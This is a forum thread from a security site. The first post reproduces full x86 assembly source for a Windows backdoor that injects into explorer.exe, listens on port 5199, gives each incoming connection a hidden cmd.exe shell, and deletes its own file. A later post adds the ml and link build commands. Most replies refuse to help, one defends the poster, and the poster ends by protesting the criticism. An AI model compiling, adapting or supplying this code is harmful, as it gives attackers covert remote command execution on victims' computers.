-
March 8th, 2004, 12:14 PM
#1
Member
ASM backdoor
Guys I’m NOT very good with ASM / C (have abit different approach)
How could I compile the following code in to executable PE (.exe) or convert it in to compil-eable C code ?
--------------code-----------------------------
When this EXE is ran it will create a thread
;inside of explorer.exe that listens on port 5199
;for connections. Then the EXE deletes itself
;leaving no traces.
;Each new connection is redirected to a spawned
;cmd.exe process until the next reboot.
;linker options: /base:0x13140000 /filealign:0x200 /merge:.data=.text /section:.text,RWX /subsystem:windows /libpath:\masm32\lib backdoor.obj
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\wsock32.inc
includelib \masm32\lib\wsock32.lib
.data
szTarget byte 'Shell_TrayWnd', 0
szUser32 byte 'user32.dll', 0
szWinsock byte 'wsock32.dll', 0
szCommandLine byte 'cmd.exe', 0
szSharedData byte 261 dup (0)
.data?
hModule dword ?
hNewModule dword ?
hProcess dword ?
dwSize dword ?
dwPid dword ?
dwBytesWritten dword ?
dwTid dword ?
WSAData WSADATA <>
.code
ShellClient proc dwSock:dword
local sat:SECURITY_ATTRIBUTES
local hiRead:dword
local hoRead:dword
local hiWrite:dword
local hoWrite:dword
local startupinfo:STARTUPINFO
local processinfo:PROCESS_INFORMATION
local exitcode:dword
local buffer[1024]:byte
local bytes:dword
local available:dword
local data:dword
mov sat.nLength, sizeof SECURITY_ATTRIBUTES
mov sat.lpSecurityDescriptor, 0
mov sat.bInheritHandle, TRUE
invoke CreatePipe, addr hiRead, addr hiWrite, addr sat, 0
invoke CreatePipe, addr hoRead, addr hoWrite, addr sat, 0
invoke GetStartupInfo, addr startupinfo
mov startupinfo.cb, sizeof STARTUPINFO
mov eax, hoWrite
mov startupinfo.hStdOutput, eax
mov startupinfo.hStdError, eax
mov eax, hiRead
mov startupinfo.hStdInput, eax
mov startupinfo.dwFlags, STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES
mov startupinfo.wShowWindow, SW_HIDE
invoke CreateProcess, 0, addr szCommandLine, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, addr startupinfo, addr processinfo
invoke CloseHandle, hoWrite
invoke CloseHandle, hiRead
mov bytes, 1
invoke ioctlsocket, dwSock, FIONBIO, addr bytes
.while TRUE
invoke Sleep, 1
invoke GetExitCodeProcess, processinfo.hProcess, addr exitcode
.if exitcode != STILL_ACTIVE
.break
.endif
invoke PeekNamedPipe, hoRead, addr buffer, 1024, addr bytes, addr available, 0
.if bytes != 0
.if available > 1024
.while bytes >= 1024
invoke Sleep, 1
invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0
.if bytes != 0
invoke send, dwSock, addr buffer, bytes, 0
.endif
.endw
.else
invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0
.if bytes != 0
invoke send, dwSock, addr buffer, bytes, 0
.endif
.endif
.endif
invoke recv, dwSock, addr buffer, 1024, 0
.if eax == SOCKET_ERROR || eax == 0
invoke WSAGetLastError
.if eax == WSAEWOULDBLOCK
.continue
.else
invoke TerminateProcess, processinfo.hProcess, 0
.break
.endif
.else
mov edx, eax
invoke WriteFile, hiWrite, addr buffer, edx, addr bytes, 0
.endif
.endw
invoke CloseHandle, hiWrite
invoke CloseHandle, hoRead
invoke closesocket, dwSock
ret
ShellClient endp
Shelld proc
local SockAddrIn:sockaddr_in
local dwSock:dword
local dwMode:dword
invoke DeleteFile, addr szSharedData
invoke LoadLibrary, addr szUser32
invoke LoadLibrary, addr szWinsock
invoke WSAStartup, 101h, addr WSAData
invoke socket, PF_INET, SOCK_STREAM, 0
mov dwSock, eax
mov SockAddrIn.sin_family, AF_INET
invoke htons, 5199
mov SockAddrIn.sin_port, ax
mov SockAddrIn.sin_addr, INADDR_ANY
invoke bind, dwSock, addr SockAddrIn, sizeof SockAddrIn
mov dwMode, 1
invoke ioctlsocket, dwSock, FIONBIO, addr dwMode
invoke listen, dwSock, SOMAXCONN
@@:
invoke accept, dwSock, addr SockAddrIn, 0
.if eax != INVALID_SOCKET
mov edx, eax
invoke CreateThread, 0, 0, addr ShellClient, edx, 0, 0
invoke CloseHandle, eax
.endif
invoke Sleep, 1000
jmp @B
ret
Shelld endp
start:
invoke GetModuleHandle, 0
mov hModule, eax
mov edi, eax
assume editr IMAGE_DOS_HEADER
add edi, [edi].e_lfanew
add edi, sizeof dword
add edi, sizeof IMAGE_FILE_HEADER
assume editr IMAGE_OPTIONAL_HEADER32
mov eax, [edi].SizeOfImage
mov dwSize, eax
assume edi:NOTHING
invoke GetModuleFileName, 0, addr szSharedData, 261
invoke FindWindow, addr szTarget, 0
invoke GetWindowThreadProcessId, eax, addr dwPid
invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, dwPid
mov hProcess, eax
invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE
invoke VirtualAllocEx, hProcess, hModule, dwSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE
mov hNewModule, eax
invoke WriteProcessMemory, hProcess, hNewModule, hModule, dwSize, addr dwBytesWritten
invoke CreateRemoteThread, hProcess, 0, 0, addr Shelld, hModule, 0, addr dwTid
invoke ExitProcess, 0
end start
-----------------end code--------------------
-
March 8th, 2004, 01:19 PM
#2
The whole point of releasing this kind of "tool" in this form is to prevent n00bs from having yet another scriptkiddie tool.
Start by learning what assembler is and how, when and where to use it.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
March 8th, 2004, 01:59 PM
#3
I do not think you will get anyone here to help you write a backdoor, well, not openly at least
You do not explain your reasons, and even if you did, I wonder if people would really believe you.
I do hope you read the front page of this forum.............carefully?
I would point out that those who do not KNOW how to write malware get caught........for certain.
I agree with SirDice....................learn assembler, and then you will know
Take care, I think that you might need to?
-
March 8th, 2004, 02:10 PM
#4
*sigh* let me help you write a tool you will a) claim you wrote on your own to gain 31337 5+@+|_|5 with your skiddie buddies B) will be used to hamper my/others security and C) will give you a ego the size of texas. No thanks.
REread what this site is about. and since you dont know what you are doing, its gonna be a VERY short time before your caught. Get up, go out and enjoy the sun, who knows when you wont be able to do that anymore...
Remember -
The ark was built by amatures...
The Titanic was built by professionals.
-
March 8th, 2004, 06:26 PM
#5
Member
who's talking about lamers here.....I sad that ASM is not my powerful side....
here's the diffcult way of doing it....
anyway
:ml /c /coff backdor.asm
link /base:0x13140000 /filealign:0x200 /merge:.data=.text /section:.text,RWX /subsystem:windows /libpath:\masm32\lib backdoor.obj
any easy ways of doing it?
-
March 8th, 2004, 06:43 PM
#6
the reason for calling is not because you can't code in ASM. it's because of what you are tryin to compile buddy. if you don't know already you are asking us to help you compile a skiddie tool. if you would have asked for help in learning Assembly or help compiling some other valid program i think people would helped you. you said you are not that familear with Assembly and to start off you are trying to compile a pre-coded backdoor program. Strange?? i think your intensions are not to learn Assembly but to only get this program to compile ane show off or to try to crack into somebody comp. Hope bubba will be real nice to you. "bubba who??". you'r new room mate.
-
March 8th, 2004, 06:47 PM
#7
Member
lmao, you don't learn do you?
People have just bombed you telling you NOT to post this type of stuff in these forums. Yet you totally ignore all the advice given and continue this thread.
Read A Guide to AntiOnline and the world of security writen by Ennis
-
March 8th, 2004, 08:40 PM
#8
Like I said in another thread, hope your "knowledge" and "t00lz" help you when you are getting "hacked " by above-mentioned bubba
Remember -
The ark was built by amatures...
The Titanic was built by professionals.
-
March 9th, 2004, 12:04 AM
#9
Senior Member
this situation starts being annoying.....from the one side those who came here to learn hacking for impressing their friends( they are banned after 2 or three posts of this kind after being flamed)....from the other side the 'good guys'...you are all so nice....you never did anything illegal,never used a backdoor,never used trojans or evn scriptkiddie tools,always on the good site....in fact i cannot say anything to senior members because at least they know more than me and i sort of respact them....but what is going on with newbies? I mean there is not a nomal newbie out there? From the one side script kiddies from the other angels???? What a f**k....anyway i dont think the intentions of karavay were bad at all..at least he may try to learn programming not flame other people...anyway cheers and dont be so quick to judge if you cannot help.....(thats particularly for newbies)
Is that the place where I am supposed to say sth clever and brilliant so that everybody understands how clever nice guy I am????
Screw you guys I am going home!-Kartman
-
March 9th, 2004, 03:28 PM
#10
Member
thanks tyfon !
Camon guys what is this all about.....I mean what is this site about........ ask yourself this burning question.......I didnt ask you how TO hack microsoft did I ... the question was how to compile the code....and I'm sure that half of you guys have copied the code .. next time I'll post the code without any comments to it!!!
-------------
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|